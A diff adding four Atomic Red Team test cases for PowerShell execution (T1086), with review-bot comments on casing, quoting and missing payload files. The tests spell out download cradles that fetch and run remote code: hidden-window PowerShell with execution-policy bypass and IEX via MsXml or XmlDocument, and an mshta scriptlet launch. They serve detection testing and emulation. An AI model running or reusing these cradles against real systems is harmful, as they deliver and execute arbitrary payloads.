diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index 8cf132dd..fff2ae14 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md @@ -34,6 +34,14 @@ Remote Support: Yes - [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user) +- [Atomic Test #7 - Powershell MsXml COM object](#atomic-test-7---powershell-msxml-com-object) + +- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests) + +- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download) + +- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle) +
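Review bot: the four new table-of-contents entries spell the technique "Powershell" while the existing entry for Test #6 uses "PowerShell"; adopt the existing casing for tests #7 to #10 so the headings, the anchors and the index lines all agree (the lowercase anchors are unaffected by re-casing). The anchor `#atomic-test-9---powershell-invoke-mshtaexe-download` drops the dot from `mshta.exe`, which is how GitHub slugs a heading containing a period, so it resolves as written.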
@@ -142,3 +150,76 @@ Using PS 5.1, add a user via CLI New-LocalUser -FullName '${full_name}' -Name '${user_name}' -Password ${password} ‑Description '${description}' ```
+
+ +## Atomic Test #7 - Powershell MsXml COM object +Provided by https://github.com/mgreen27/mgreen27.github.io +Powershell MsXml COM object. +Not proxy aware removing cache although does not appear to write to those locations + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| + +#### Run it with `powershell`! +``` +powershell.exe -exec bypass -windowstyle hidden -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(‘GET’,’${url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText” +``` +
+
+ +## Atomic Test #8 - Powershell XML requests +Provided by https://github.com/mgreen27/mgreen27.github.io +Powershell xml download request + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml| + +#### Run it with `powershell`! +``` +"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('${url}');$Xml.command.a.execute | IEX" +``` +
+
+ +## Atomic Test #9 - Powershell invoke mshta.exe download +Provided by https://github.com/mgreen27/mgreen27.github.io +Powershell invoke mshta to download payload + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct| + +#### Run it with `powershell`! +``` +"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:${url}").Exec();close()" +``` +
+
+ +## Atomic Test #10 - Powershell Invoke-DownloadCradle +Provided by https://github.com/mgreen27/mgreen27.github.io +Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. + +**Supported Platforms:** Windows + + +#### Run it with these steps! +1. Open Powershell_ise as a Privileged Account +2. Invoke-DownloadCradle.ps1 + + +
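Review bot: tests #8 and #9 sit under "Run it with `powershell`!" but begin with a quoted executable path (`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec ...` and `"C:\Windows\system32\cmd.exe" /c ...`); PowerShell parses a leading quoted string as an expression, so the `-exec` or `/c` that follows is rejected as an unexpected token unless the line is prefixed with the call operator `&`. Test #9 additionally nests unescaped double quotes (`GetObject("script:${url}")`) inside the double-quoted `/c "..."` argument, which ends the outer string early when the line is parsed by PowerShell; escape the inner quotes or use single quotes for the inner strings, as test #8 already does with `$Xml.Load('${url}')`. Test #7 mixes typographic and ASCII quotes (`“$comMsXml=...`, `Open(‘GET’,’${url}',$False)`); normalise them to ASCII `"` and `'` so the command survives copy-paste and the YAML source, and reword the description "Not proxy aware removing cache although does not appear to write to those locations", which does not parse as written (what is removed, and which locations are meant?). Test #10 has no Inputs block and step 2 names `Invoke-DownloadCradle.ps1` with no path or URL, and none of the files the new tests reference (`test.ps1`, `test.xml`, `mshta.sct`, the cradle script) are added under `atomics/T1086/payloads` in this patch; either include them or state where they come from. Two smaller points: test #9 never runs PowerShell itself (cmd.exe launches mshta.exe), so say which technique it is meant to exercise or reconsider placing it under T1086; and since test #10 states it "is used to generate Network and Endpoint artifacts", listing the artifacts a reviewer should expect would make it usable for detection validation.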
diff --git a/atomics/index.md b/atomics/index.md index 75670230..61ab9c2f 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -454,6 +454,10 @@ - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows] - Atomic Test #5: Invoke-AppPathBypass [windows] - Atomic Test #6: PowerShell Add User [windows] + - Atomic Test #7: Powershell MsXml COM object [windows] + - Atomic Test #8: Powershell XML requests [windows] + - Atomic Test #9: Powershell invoke mshta.exe download [windows] + - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] - [T1121 Regsvcs/Regasm](./T1121/T1121.md) - Atomic Test #1: Regasm Uninstall Method Call Test [windows] - Atomic Test #2: Regsvs Uninstall Method Call Test [windows] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index d266deb2..83d3cdbf 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -374,6 +374,10 @@ - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows] - Atomic Test #5: Invoke-AppPathBypass [windows] - Atomic Test #6: PowerShell Add User [windows] + - Atomic Test #7: Powershell MsXml COM object [windows] + - Atomic Test #8: Powershell XML requests [windows] + - Atomic Test #9: Powershell invoke mshta.exe download [windows] + - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] - [T1121 Regsvcs/Regasm](./T1121/T1121.md) - Atomic Test #1: Regasm Uninstall Method Call Test [windows] - Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
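Review bot: the new entries in both `atomics/index.md` and `atomics/windows-index.md` use "Powershell" where the adjacent Test #6 line uses "PowerShell"; match the existing casing in both files. Otherwise the two indexes are consistent with each other and with the headings added to `T1086.md` (same numbering, same titles, `[windows]` tag on each line), so the only change needed here is the casing, applied to all four lines in each file.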